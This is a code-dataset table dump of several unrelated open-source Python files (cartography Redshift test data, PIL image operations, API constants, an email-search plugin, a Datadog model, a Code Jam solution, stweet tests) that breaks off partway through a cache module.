hexsha
stringlengths 40
40
| size
int64 4
1.02M
| ext
stringclasses 8
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
209
| max_stars_repo_name
stringlengths 5
121
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
209
| max_issues_repo_name
stringlengths 5
121
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
209
| max_forks_repo_name
stringlengths 5
121
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 4
1.02M
| avg_line_length
float64 1.07
66.1k
| max_line_length
int64 4
266k
| alphanum_fraction
float64 0.01
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ddd89d2c7441f04a92b4e5210d667a836ca1c871
| 3,253
|
py
|
Python
|
tests/data/aws/redshift.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 2,322
|
2019-03-02T01:07:20.000Z
|
2022-03-31T20:39:12.000Z
|
tests/data/aws/redshift.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 462
|
2019-03-07T18:38:11.000Z
|
2022-03-31T14:55:20.000Z
|
tests/data/aws/redshift.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 246
|
2019-03-03T02:39:23.000Z
|
2022-02-24T09:46:38.000Z
|
import datetime
CLUSTERS = [{
'AllowVersionUpgrade': True,
'AutomatedSnapshotRetentionPeriod': 35,
'AvailabilityZone': 'us-east-1e',
'ClusterCreateTime': datetime.datetime(2018, 9, 12, 0, 19, 33, 652000),
'ClusterIdentifier': 'my-cluster',
'ClusterNodes': [
{
'NodeRole': 'LEADER',
'PrivateIPAddress': '10.0.34.72',
'PublicIPAddress': '1.2.3.4',
},
{
'NodeRole': 'COMPUTE-0',
'PrivateIPAddress': '10.0.45.66',
'PublicIPAddress': '2.3.4.5',
},
],
'ClusterParameterGroups': [{
'ClusterParameterStatusList': [
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'enable_user_activity_logging',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'max_cursor_result_set_size',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'query_group',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'datestyle',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'extra_float_digits',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'search_path',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'statement_timeout',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'wlm_json_configuration',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'require_ssl',
},
{
'ParameterApplyStatus': 'in-sync',
'ParameterName': 'use_fips_ssl',
},
],
'ParameterApplyStatus': 'in-sync',
'ParameterGroupName': 'my-cluster',
}],
'ClusterPublicKey': 'ssh-rsa AAAA Amazon-Redshift\n',
'ClusterRevisionNumber': '15503',
'ClusterSecurityGroups': [],
'ClusterStatus': 'available',
'ClusterSubnetGroupName': 'redshift',
'ClusterVersion': '1.0',
'DBName': 'dev',
'DeferredMaintenanceWindows': [],
'ElasticResizeNumberOfNodeOptions': '[2,3,5,6,7,8]',
'Encrypted': True,
'Endpoint': {
'Address': 'my-cluster.abc.us-east-1.redshift.amazonaws.example.com',
'Port': 5439,
},
'EnhancedVpcRouting': False,
'IamRoles': [{
'ApplyStatus': 'in-sync',
'IamRoleArn': 'arn:aws:iam::1111:role/my-redshift-iam-role',
}],
'KmsKeyId': 'arn:aws:kms:us-east-1:1111:key/GUID',
'MaintenanceTrackName': 'trailing',
'ManualSnapshotRetentionPeriod': -1,
'MasterUsername': 'masteruser',
'NodeType': 'ds2.8xlarge',
'NumberOfNodes': 2,
'PendingModifiedValues': {},
'PreferredMaintenanceWindow': 'wed:09:00-wed:09:30',
'PubliclyAccessible': False,
'Tags': [],
'VpcId': 'my_vpc',
'VpcSecurityGroups': [{
'Status': 'active',
'VpcSecurityGroupId': 'my-vpc-sg',
}],
}]
| 31.892157
| 77
| 0.51245
|
058447b68259e651fe67a60b08dd192b3f3d90e3
| 19,804
|
py
|
Python
|
virtual/lib/python3.6/site-packages/PIL/ImageOps.py
|
drewheathens/The-Moringa-Tribune
|
98ee4d63c9df6f1f7497fc6876960a822d914500
|
[
"MIT"
] | 12
|
2019-08-02T07:58:16.000Z
|
2022-01-31T23:45:08.000Z
|
virtual/lib/python3.6/site-packages/PIL/ImageOps.py
|
drewheathens/The-Moringa-Tribune
|
98ee4d63c9df6f1f7497fc6876960a822d914500
|
[
"MIT"
] | 23
|
2019-01-19T08:54:48.000Z
|
2022-03-11T23:39:37.000Z
|
virtual/lib/python3.6/site-packages/PIL/ImageOps.py
|
eyern/instagram_clone
|
c18da15b35d28d91c3f63904af9d5da4e8e3e8ae
|
[
"MIT"
] | 11
|
2019-07-31T16:23:36.000Z
|
2022-01-29T08:30:07.000Z
|
#
# The Python Imaging Library.
# $Id$
#
# standard image operations
#
# History:
# 2001-10-20 fl Created
# 2001-10-23 fl Added autocontrast operator
# 2001-12-18 fl Added Kevin's fit operator
# 2004-03-14 fl Fixed potential division by zero in equalize
# 2005-05-05 fl Fixed equalize for low number of values
#
# Copyright (c) 2001-2004 by Secret Labs AB
# Copyright (c) 2001-2004 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from . import Image
from ._util import isStringType
import operator
import functools
import warnings
#
# helpers
def _border(border):
if isinstance(border, tuple):
if len(border) == 2:
left, top = right, bottom = border
elif len(border) == 4:
left, top, right, bottom = border
else:
left = top = right = bottom = border
return left, top, right, bottom
def _color(color, mode):
if isStringType(color):
from . import ImageColor
color = ImageColor.getcolor(color, mode)
return color
def _lut(image, lut):
if image.mode == "P":
# FIXME: apply to lookup table, not image data
raise NotImplementedError("mode P support coming soon")
elif image.mode in ("L", "RGB"):
if image.mode == "RGB" and len(lut) == 256:
lut = lut + lut + lut
return image.point(lut)
else:
raise IOError("not supported for this image mode")
#
# actions
def autocontrast(image, cutoff=0, ignore=None):
"""
Maximize (normalize) image contrast. This function calculates a
histogram of the input image, removes **cutoff** percent of the
lightest and darkest pixels from the histogram, and remaps the image
so that the darkest pixel becomes black (0), and the lightest
becomes white (255).
:param image: The image to process.
:param cutoff: How many percent to cut off from the histogram.
:param ignore: The background pixel value (use None for no background).
:return: An image.
"""
histogram = image.histogram()
lut = []
for layer in range(0, len(histogram), 256):
h = histogram[layer:layer+256]
if ignore is not None:
# get rid of outliers
try:
h[ignore] = 0
except TypeError:
# assume sequence
for ix in ignore:
h[ix] = 0
if cutoff:
# cut off pixels from both ends of the histogram
# get number of pixels
n = 0
for ix in range(256):
n = n + h[ix]
# remove cutoff% pixels from the low end
cut = n * cutoff // 100
for lo in range(256):
if cut > h[lo]:
cut = cut - h[lo]
h[lo] = 0
else:
h[lo] -= cut
cut = 0
if cut <= 0:
break
# remove cutoff% samples from the hi end
cut = n * cutoff // 100
for hi in range(255, -1, -1):
if cut > h[hi]:
cut = cut - h[hi]
h[hi] = 0
else:
h[hi] -= cut
cut = 0
if cut <= 0:
break
# find lowest/highest samples after preprocessing
for lo in range(256):
if h[lo]:
break
for hi in range(255, -1, -1):
if h[hi]:
break
if hi <= lo:
# don't bother
lut.extend(list(range(256)))
else:
scale = 255.0 / (hi - lo)
offset = -lo * scale
for ix in range(256):
ix = int(ix * scale + offset)
if ix < 0:
ix = 0
elif ix > 255:
ix = 255
lut.append(ix)
return _lut(image, lut)
def colorize(image, black, white, mid=None, blackpoint=0,
whitepoint=255, midpoint=127):
"""
Colorize grayscale image.
This function calculates a color wedge which maps all black pixels in
the source image to the first color and all white pixels to the
second color. If **mid** is specified, it uses three-color mapping.
The **black** and **white** arguments should be RGB tuples or color names;
optionally you can use three-color mapping by also specifying **mid**.
Mapping positions for any of the colors can be specified
(e.g. **blackpoint**), where these parameters are the integer
value corresponding to where the corresponding color should be mapped.
These parameters must have logical order, such that
**blackpoint** <= **midpoint** <= **whitepoint** (if **mid** is specified).
:param image: The image to colorize.
:param black: The color to use for black input pixels.
:param white: The color to use for white input pixels.
:param mid: The color to use for midtone input pixels.
:param blackpoint: an int value [0, 255] for the black mapping.
:param whitepoint: an int value [0, 255] for the white mapping.
:param midpoint: an int value [0, 255] for the midtone mapping.
:return: An image.
"""
# Initial asserts
assert image.mode == "L"
if mid is None:
assert 0 <= blackpoint <= whitepoint <= 255
else:
assert 0 <= blackpoint <= midpoint <= whitepoint <= 255
# Define colors from arguments
black = _color(black, "RGB")
white = _color(white, "RGB")
if mid is not None:
mid = _color(mid, "RGB")
# Empty lists for the mapping
red = []
green = []
blue = []
# Create the low-end values
for i in range(0, blackpoint):
red.append(black[0])
green.append(black[1])
blue.append(black[2])
# Create the mapping (2-color)
if mid is None:
range_map = range(0, whitepoint - blackpoint)
for i in range_map:
red.append(black[0] + i * (white[0] - black[0]) // len(range_map))
green.append(black[1] + i * (white[1] - black[1]) // len(range_map))
blue.append(black[2] + i * (white[2] - black[2]) // len(range_map))
# Create the mapping (3-color)
else:
range_map1 = range(0, midpoint - blackpoint)
range_map2 = range(0, whitepoint - midpoint)
for i in range_map1:
red.append(black[0] + i * (mid[0] - black[0]) // len(range_map1))
green.append(black[1] + i * (mid[1] - black[1]) // len(range_map1))
blue.append(black[2] + i * (mid[2] - black[2]) // len(range_map1))
for i in range_map2:
red.append(mid[0] + i * (white[0] - mid[0]) // len(range_map2))
green.append(mid[1] + i * (white[1] - mid[1]) // len(range_map2))
blue.append(mid[2] + i * (white[2] - mid[2]) // len(range_map2))
# Create the high-end values
for i in range(0, 256 - whitepoint):
red.append(white[0])
green.append(white[1])
blue.append(white[2])
# Return converted image
image = image.convert("RGB")
return _lut(image, red + green + blue)
def pad(image, size, method=Image.NEAREST, color=None, centering=(0.5, 0.5)):
"""
Returns a sized and padded version of the image, expanded to fill the
requested aspect ratio and size.
:param image: The image to size and crop.
:param size: The requested output size in pixels, given as a
(width, height) tuple.
:param method: What resampling method to use. Default is
:py:attr:`PIL.Image.NEAREST`.
:param color: The background color of the padded image.
:param centering: Control the position of the original image within the
padded version.
(0.5, 0.5) will keep the image centered
(0, 0) will keep the image aligned to the top left
(1, 1) will keep the image aligned to the bottom
right
:return: An image.
"""
im_ratio = image.width / image.height
dest_ratio = float(size[0]) / size[1]
if im_ratio == dest_ratio:
out = image.resize(size, resample=method)
else:
out = Image.new(image.mode, size, color)
if im_ratio > dest_ratio:
new_height = int(image.height / image.width * size[0])
if new_height != size[1]:
image = image.resize((size[0], new_height), resample=method)
y = int((size[1] - new_height) * max(0, min(centering[1], 1)))
out.paste(image, (0, y))
else:
new_width = int(image.width / image.height * size[1])
if new_width != size[0]:
image = image.resize((new_width, size[1]), resample=method)
x = int((size[0] - new_width) * max(0, min(centering[0], 1)))
out.paste(image, (x, 0))
return out
def crop(image, border=0):
"""
Remove border from image. The same amount of pixels are removed
from all four sides. This function works on all image modes.
.. seealso:: :py:meth:`~PIL.Image.Image.crop`
:param image: The image to crop.
:param border: The number of pixels to remove.
:return: An image.
"""
left, top, right, bottom = _border(border)
return image.crop(
(left, top, image.size[0]-right, image.size[1]-bottom)
)
def scale(image, factor, resample=Image.NEAREST):
"""
Returns a rescaled image by a specific factor given in parameter.
A factor greater than 1 expands the image, between 0 and 1 contracts the
image.
:param image: The image to rescale.
:param factor: The expansion factor, as a float.
:param resample: An optional resampling filter. Same values possible as
in the PIL.Image.resize function.
:returns: An :py:class:`~PIL.Image.Image` object.
"""
if factor == 1:
return image.copy()
elif factor <= 0:
raise ValueError("the factor must be greater than 0")
else:
size = (int(round(factor * image.width)),
int(round(factor * image.height)))
return image.resize(size, resample)
def deform(image, deformer, resample=Image.BILINEAR):
"""
Deform the image.
:param image: The image to deform.
:param deformer: A deformer object. Any object that implements a
**getmesh** method can be used.
:param resample: An optional resampling filter. Same values possible as
in the PIL.Image.transform function.
:return: An image.
"""
return image.transform(
image.size, Image.MESH, deformer.getmesh(image), resample
)
def equalize(image, mask=None):
"""
Equalize the image histogram. This function applies a non-linear
mapping to the input image, in order to create a uniform
distribution of grayscale values in the output image.
:param image: The image to equalize.
:param mask: An optional mask. If given, only the pixels selected by
the mask are included in the analysis.
:return: An image.
"""
if image.mode == "P":
image = image.convert("RGB")
h = image.histogram(mask)
lut = []
for b in range(0, len(h), 256):
histo = [_f for _f in h[b:b+256] if _f]
if len(histo) <= 1:
lut.extend(list(range(256)))
else:
step = (functools.reduce(operator.add, histo) - histo[-1]) // 255
if not step:
lut.extend(list(range(256)))
else:
n = step // 2
for i in range(256):
lut.append(n // step)
n = n + h[i+b]
return _lut(image, lut)
def expand(image, border=0, fill=0):
"""
Add border to the image
:param image: The image to expand.
:param border: Border width, in pixels.
:param fill: Pixel fill value (a color value). Default is 0 (black).
:return: An image.
"""
left, top, right, bottom = _border(border)
width = left + image.size[0] + right
height = top + image.size[1] + bottom
out = Image.new(image.mode, (width, height), _color(fill, image.mode))
out.paste(image, (left, top))
return out
def fit(image, size, method=Image.NEAREST, bleed=0.0, centering=(0.5, 0.5)):
"""
Returns a sized and cropped version of the image, cropped to the
requested aspect ratio and size.
This function was contributed by Kevin Cazabon.
:param image: The image to size and crop.
:param size: The requested output size in pixels, given as a
(width, height) tuple.
:param method: What resampling method to use. Default is
:py:attr:`PIL.Image.NEAREST`.
:param bleed: Remove a border around the outside of the image from all
four edges. The value is a decimal percentage (use 0.01 for
one percent). The default value is 0 (no border).
Cannot be greater than or equal to 0.5.
:param centering: Control the cropping position. Use (0.5, 0.5) for
center cropping (e.g. if cropping the width, take 50% off
of the left side, and therefore 50% off the right side).
(0.0, 0.0) will crop from the top left corner (i.e. if
cropping the width, take all of the crop off of the right
side, and if cropping the height, take all of it off the
bottom). (1.0, 0.0) will crop from the bottom left
corner, etc. (i.e. if cropping the width, take all of the
crop off the left side, and if cropping the height take
none from the top, and therefore all off the bottom).
:return: An image.
"""
# by Kevin Cazabon, Feb 17/2000
# kevin@cazabon.com
# http://www.cazabon.com
# ensure centering is mutable
centering = list(centering)
if not 0.0 <= centering[0] <= 1.0:
centering[0] = 0.5
if not 0.0 <= centering[1] <= 1.0:
centering[1] = 0.5
if not 0.0 <= bleed < 0.5:
bleed = 0.0
# calculate the area to use for resizing and cropping, subtracting
# the 'bleed' around the edges
# number of pixels to trim off on Top and Bottom, Left and Right
bleed_pixels = (bleed * image.size[0], bleed * image.size[1])
live_size = (image.size[0] - bleed_pixels[0] * 2,
image.size[1] - bleed_pixels[1] * 2)
# calculate the aspect ratio of the live_size
live_size_ratio = float(live_size[0]) / live_size[1]
# calculate the aspect ratio of the output image
output_ratio = float(size[0]) / size[1]
# figure out if the sides or top/bottom will be cropped off
if live_size_ratio >= output_ratio:
# live_size is wider than what's needed, crop the sides
crop_width = output_ratio * live_size[1]
crop_height = live_size[1]
else:
# live_size is taller than what's needed, crop the top and bottom
crop_width = live_size[0]
crop_height = live_size[0] / output_ratio
# make the crop
crop_left = bleed_pixels[0] + (live_size[0]-crop_width) * centering[0]
crop_top = bleed_pixels[1] + (live_size[1]-crop_height) * centering[1]
crop = (
crop_left, crop_top,
crop_left + crop_width, crop_top + crop_height
)
# resize the image and return it
return image.resize(size, method, box=crop)
def flip(image):
"""
Flip the image vertically (top to bottom).
:param image: The image to flip.
:return: An image.
"""
return image.transpose(Image.FLIP_TOP_BOTTOM)
def grayscale(image):
"""
Convert the image to grayscale.
:param image: The image to convert.
:return: An image.
"""
return image.convert("L")
def invert(image):
"""
Invert (negate) the image.
:param image: The image to invert.
:return: An image.
"""
lut = []
for i in range(256):
lut.append(255-i)
return _lut(image, lut)
def mirror(image):
"""
Flip image horizontally (left to right).
:param image: The image to mirror.
:return: An image.
"""
return image.transpose(Image.FLIP_LEFT_RIGHT)
def posterize(image, bits):
"""
Reduce the number of bits for each color channel.
:param image: The image to posterize.
:param bits: The number of bits to keep for each channel (1-8).
:return: An image.
"""
lut = []
mask = ~(2**(8-bits)-1)
for i in range(256):
lut.append(i & mask)
return _lut(image, lut)
def solarize(image, threshold=128):
"""
Invert all pixel values above a threshold.
:param image: The image to solarize.
:param threshold: All pixels above this greyscale level are inverted.
:return: An image.
"""
lut = []
for i in range(256):
if i < threshold:
lut.append(i)
else:
lut.append(255-i)
return _lut(image, lut)
# --------------------------------------------------------------------
# PIL USM components, from Kevin Cazabon.
def gaussian_blur(im, radius=None):
""" PIL_usm.gblur(im, [radius])"""
warnings.warn(
'PIL.ImageOps.gaussian_blur is deprecated. '
'Use PIL.ImageFilter.GaussianBlur instead. '
'This function will be removed in a future version.',
DeprecationWarning
)
if radius is None:
radius = 5.0
im.load()
return im.im.gaussian_blur(radius)
def gblur(im, radius=None):
""" PIL_usm.gblur(im, [radius])"""
warnings.warn(
'PIL.ImageOps.gblur is deprecated. '
'Use PIL.ImageFilter.GaussianBlur instead. '
'This function will be removed in a future version.',
DeprecationWarning
)
return gaussian_blur(im, radius)
def unsharp_mask(im, radius=None, percent=None, threshold=None):
""" PIL_usm.usm(im, [radius, percent, threshold])"""
warnings.warn(
'PIL.ImageOps.unsharp_mask is deprecated. '
'Use PIL.ImageFilter.UnsharpMask instead. '
'This function will be removed in a future version.',
DeprecationWarning
)
if radius is None:
radius = 5.0
if percent is None:
percent = 150
if threshold is None:
threshold = 3
im.load()
return im.im.unsharp_mask(radius, percent, threshold)
def usm(im, radius=None, percent=None, threshold=None):
""" PIL_usm.usm(im, [radius, percent, threshold])"""
warnings.warn(
'PIL.ImageOps.usm is deprecated. '
'Use PIL.ImageFilter.UnsharpMask instead. '
'This function will be removed in a future version.',
DeprecationWarning
)
return unsharp_mask(im, radius, percent, threshold)
def box_blur(image, radius):
"""
Blur the image by setting each pixel to the average value of the pixels
in a square box extending radius pixels in each direction.
Supports float radius of arbitrary size. Uses an optimized implementation
which runs in linear time relative to the size of the image
for any radius value.
:param image: The image to blur.
:param radius: Size of the box in one direction. Radius 0 does not blur,
returns an identical image. Radius 1 takes 1 pixel
in each direction, i.e. 9 pixels in total.
:return: An image.
"""
warnings.warn(
'PIL.ImageOps.box_blur is deprecated. '
'Use PIL.ImageFilter.BoxBlur instead. '
'This function will be removed in a future version.',
DeprecationWarning
)
image.load()
return image._new(image.im.box_blur(radius))
| 31.890499
| 80
| 0.587508
|
8967d95870f1150eb75e931f94e07ff299bc2e0b
| 1,297
|
py
|
Python
|
api/constants.py
|
Ju99ernaut/blocomposer-templates-public
|
74867218c42f72642ddb0a7a3e389116f4a85d3d
|
[
"MIT"
] | null | null | null |
api/constants.py
|
Ju99ernaut/blocomposer-templates-public
|
74867218c42f72642ddb0a7a3e389116f4a85d3d
|
[
"MIT"
] | null | null | null |
api/constants.py
|
Ju99ernaut/blocomposer-templates-public
|
74867218c42f72642ddb0a7a3e389116f4a85d3d
|
[
"MIT"
] | null | null | null |
"""
Constants useful for data module
"""
TEMPLATES_TABLE = "templates"
ASSETS_TABLE = "assets"
BLOCKS_TABLE = "blocks"
BOOKMARKS_TABLE = "bookmarks"
COMMENTS_TABLE = "comments"
USERS_TABLE = "users"
USERS_TOKENS_TABLE = "users_tokens"
AUTHORS_TABLE = "authors"
EMAILS_TABLE = "emails"
ASSETS_KEY = "assets"
ID_KEY = "id"
UID_KEY = "uid"
UUID_KEY = "uuid"
NAME_KEY = "name"
DESCRIPTION_KEY = "description"
TEMPLATE_KEY = "template"
THUMBNAIL_KEY = "thumbnail"
PAGES_KEY = "pages"
STYLES_KEY = "styles"
URL_KEY = "url"
UPDATED_KEY = "updated_at"
USER_KEY = "user"
AUTHOR_KEY = "author"
SIZE_KEY = "size"
PUBLIC_KEY = "public"
BOOKMARKS_KEY = "bookmarks"
COMMENT_KEY = "comment"
TOKEN_KEY = "token"
FULL_NAME_KEY = "full_name"
AVATAR_URL_KEY = "avatar_url"
EMAIL_KEY = "email"
API_TAGS_METADATA = [
{"name": "user", "description": "User profile"},
{"name": "templates", "description": "Blocomposer user templates"},
{"name": "assets", "description": "Blocomposer user assets"},
{"name": "blocks", "description": "Blocomposer user blocks"},
{"name": "bookmarks", "description": "Blocomposer user bookmarks"},
{"name": "comments", "description": "Blocomposer user comments"},
{"name": "newsletter", "description": "Register/Unregister newsletter"},
]
GJS_PREFIX = "gjs-"
| 27.595745
| 76
| 0.704703
|
ea97f10d61aea3ca7bf3467565c82d742d9b20b6
| 484
|
py
|
Python
|
plugins/exalead.py
|
mirai101/Cinon
|
75173b2f61cbb4bb5a3a127f0e331ef1fa203e06
|
[
"Apache-2.0"
] | 1
|
2020-12-26T23:30:50.000Z
|
2020-12-26T23:30:50.000Z
|
plugins/exalead.py
|
mirai101/Cinon
|
75173b2f61cbb4bb5a3a127f0e331ef1fa203e06
|
[
"Apache-2.0"
] | null | null | null |
plugins/exalead.py
|
mirai101/Cinon
|
75173b2f61cbb4bb5a3a127f0e331ef1fa203e06
|
[
"Apache-2.0"
] | null | null | null |
#config = None
app_cinon = None
def search(domain, limit):
url = "http://www.exalead.com/search/web/results/?q=%40{word}&elements_per_page=10&start_index={counter}"
app_cinon.init_search(url, domain, limit, 0, 50, 'Exalead')
app_cinon.process()
return app_cinon.get_emails()
class Plugin:
def __init__(self, app, conf):#
global app_cinon, config
#config = conf
app.register_plugin('exalead', {'search': search})
app_cinon = app
| 26.888889
| 109
| 0.663223
|
e25c9cfcad0a2266646eafd926b5b01006526627
| 1,892
|
py
|
Python
|
code/venv/lib/python3.8/site-packages/datadog_api_client/v1/model/usage_attribution_pagination.py
|
Valisback/hiring-engineers
|
7196915dd5a429ae27c21fa43d527f0332e662ed
|
[
"Apache-2.0"
] | null | null | null |
code/venv/lib/python3.8/site-packages/datadog_api_client/v1/model/usage_attribution_pagination.py
|
Valisback/hiring-engineers
|
7196915dd5a429ae27c21fa43d527f0332e662ed
|
[
"Apache-2.0"
] | null | null | null |
code/venv/lib/python3.8/site-packages/datadog_api_client/v1/model/usage_attribution_pagination.py
|
Valisback/hiring-engineers
|
7196915dd5a429ae27c21fa43d527f0332e662ed
|
[
"Apache-2.0"
] | null | null | null |
# Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
from datadog_api_client.v1.model_utils import (
ModelNormal,
cached_property,
)
class UsageAttributionPagination(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
validations = {}
@cached_property
def openapi_types():
return {
"limit": (int,),
"offset": (int,),
"sort_direction": (str,),
"sort_name": (str,),
"total_number_of_records": (int,),
}
attribute_map = {
"limit": "limit",
"offset": "offset",
"sort_direction": "sort_direction",
"sort_name": "sort_name",
"total_number_of_records": "total_number_of_records",
}
read_only_vars = {}
def __init__(self, *args, **kwargs):
"""UsageAttributionPagination - a model defined in OpenAPI
Keyword Args:
limit (int): [optional] Maximum amount of records to be returned.
offset (int): [optional] Records to be skipped before beginning to return.
sort_direction (str): [optional] Direction to sort by.
sort_name (str): [optional] Field to sort by.
total_number_of_records (int): [optional] Total number of records.
"""
super().__init__(kwargs)
self._check_pos_args(args)
@classmethod
def _from_openapi_data(cls, *args, **kwargs):
"""Helper creating a new instance from a response."""
self = super(UsageAttributionPagination, cls)._from_openapi_data(kwargs)
self._check_pos_args(args)
return self
| 29.5625
| 108
| 0.631607
|
1f66691e0404727c023074c3534a6764688e82fb
| 3,382
|
py
|
Python
|
test/tests/gcj_2014_1c_b.py
|
kevinxucs/pyston
|
bdb87c1706ac74a0d15d9bc2bae53798678a5f14
|
[
"Apache-2.0"
] | 1
|
2015-11-06T03:39:51.000Z
|
2015-11-06T03:39:51.000Z
|
test/tests/gcj_2014_1c_b.py
|
kevinxucs/pyston
|
bdb87c1706ac74a0d15d9bc2bae53798678a5f14
|
[
"Apache-2.0"
] | null | null | null |
test/tests/gcj_2014_1c_b.py
|
kevinxucs/pyston
|
bdb87c1706ac74a0d15d9bc2bae53798678a5f14
|
[
"Apache-2.0"
] | null | null | null |
# expected: fail
# - working on it
import sys
def compact(s):
i = 0
while i < len(s) - 1:
if s[i] == s[i+1]:
s = s[:i] + s[i+1:]
else:
i += 1
return s
# TODO This should be a subclass of Exception not object:
class NotPossible(object):
pass
P = 1000000007
def fact(n):
t = 1
for i in xrange(1, n+1):
t = (t * i) % P
return t
if __name__ == "__main__":
# test data is from the Google CodeJam site:
s = """
3
3
ab bbbc cd
4
aa aa bc c
2
abc bcd
""".strip()
l = s.split('\n')
T = int(l.pop(0))
for _T in xrange(T):
N = int(l.pop(0))
trains = l.pop(0).split()
trains = map(compact, trains)
try:
for s in trains:
if s[0] in s[1:]:
raise NotPossible
if s[-1] in s[:-1]:
raise NotPossible
for c in s[1:-1]:
cnt = sum([s2.count(c) for s2 in trains])
assert cnt >= 1
if cnt != 1:
raise NotPossible()
# print trains
singles = {}
chunks = []
for i in xrange(N):
if len(trains[i]) == 1:
singles[trains[i]] = singles.get(trains[i], 0) + 1
else:
chunks.append(trains[i][0] + trains[i][-1])
# print singles, chunks
mult = 1
left = 0
while chunks:
# print mult, left, singles, chunks
first = chunks.pop()
assert len(set(first)) == len(first)
mult = (mult * fact(singles.pop(first[0], 0))) % P
mult = (mult * fact(singles.pop(first[-1], 0))) % P
for ch in chunks:
assert len(set(ch)) == len(ch)
if ch[0] in first:
if ch[0] in first[:-1]:
raise NotPossible()
# assert not any(c == ch[0] for c in ch[1:])
if any([c in first for c in ch[1:]]):
raise NotPossible()
assert ch[0] == first[-1]
chunks.remove(ch)
chunks.append(first + ch[1:])
break
if ch[-1] in first:
if ch[-1] in first[1:]:
raise NotPossible()
# assert not any(c == ch[-1] for c in ch[:-1])
if any([c in first for c in ch[:-1]]):
raise NotPossible()
assert ch[-1] == first[0]
chunks.remove(ch)
chunks.append(ch + first[1:])
break
else:
left += 1
continue
# print mult, left, singles, chunks
for k, v in singles.iteritems():
left += 1
mult = (mult * fact(v)) % P
assert left >= 0
while left:
mult = (mult * left) % P
left = left - 1
print "Case #%d: %d" % (_T+1, mult)
except NotPossible:
print "Case #%d: 0" % (_T+1,)
assert not l
| 28.661017
| 70
| 0.385866
|
1930b4415c3c4b687360203a5118f66249b43b8f
| 815
|
py
|
Python
|
tests/integration/import_older_version_test.py
|
markowanga/stweet
|
7f103b5c88fcef1d993d8cdc99cec358e55293f7
|
[
"MIT"
] | 101
|
2020-11-22T16:44:25.000Z
|
2022-03-30T08:42:07.000Z
|
tests/integration/import_older_version_test.py
|
markowanga/stweet
|
7f103b5c88fcef1d993d8cdc99cec358e55293f7
|
[
"MIT"
] | 53
|
2020-11-21T19:40:36.000Z
|
2022-03-02T10:09:52.000Z
|
tests/integration/import_older_version_test.py
|
markowanga/stweet
|
7f103b5c88fcef1d993d8cdc99cec358e55293f7
|
[
"MIT"
] | 16
|
2020-12-12T23:02:51.000Z
|
2022-03-01T12:10:32.000Z
|
import stweet as st
_RESOURCES_PATH = 'tests/resources'
def test_tweets_csv_import_v1_1_2():
csv_filename = f'{_RESOURCES_PATH}/tweets_v1.1.2.csv'
tweets_from_csv = st.read_tweets_from_csv_file(csv_filename)
assert len(tweets_from_csv) == 9
def test_tweets_json_import_v1_1_2():
jl_filename = f'{_RESOURCES_PATH}/tweets_v1.1.2.jl'
tweets_from_csv = st.read_tweets_from_json_lines_file(jl_filename)
assert len(tweets_from_csv) == 9
def test_user_csv_import_v1_3_0():
csv_filename = f'{_RESOURCES_PATH}/users_v1.3.0.csv'
users = st.read_users_from_csv_file(csv_filename)
assert len(users) == 2
def test_user_json_import_v1_3_0():
jl_filename = f'{_RESOURCES_PATH}/users_v1.3.0.jl'
users = st.read_users_from_json_lines_file(jl_filename)
assert len(users) == 2
| 29.107143
| 70
| 0.759509
|
c8ca6d662ca0898630009cc66097b2c473edc66d
| 5,257
|
py
|
Python
|
graph/save_cache.py
|
csmetrics/csmetrics.org
|
fa2ec2f264680a71ac6ea46d303573d24dfbe653
|
[
"CC-BY-4.0"
] | 21
|
2017-09-19T11:43:04.000Z
|
2021-12-06T17:04:05.000Z
|
graph/save_cache.py
|
123Powerful/csmetrics.org
|
788367fe32947bbd56ec2c13cee4f49dd79de231
|
[
"CC-BY-4.0"
] | 54
|
2017-08-31T22:42:51.000Z
|
2022-03-15T02:12:05.000Z
|
graph/save_cache.py
|
123Powerful/csmetrics.org
|
788367fe32947bbd56ec2c13cee4f49dd79de231
|
[
"CC-BY-4.0"
] | 9
|
2017-09-03T10:54:07.000Z
|
2022-01-16T02:44:31.000Z
|
import os, sys, json, uuid, hashlib
from multiprocessing import Pool
from elasticsearch_dsl.connections import connections
from datetime import datetime
from graph.schema_cache import BrowseCache, AuthorGroup, PaperGroup, AuthorInfo, PaperInfo
from graph.config import conf
hostname = conf.get("elasticsearch.hostname")
def generate_uuid(seed = None):
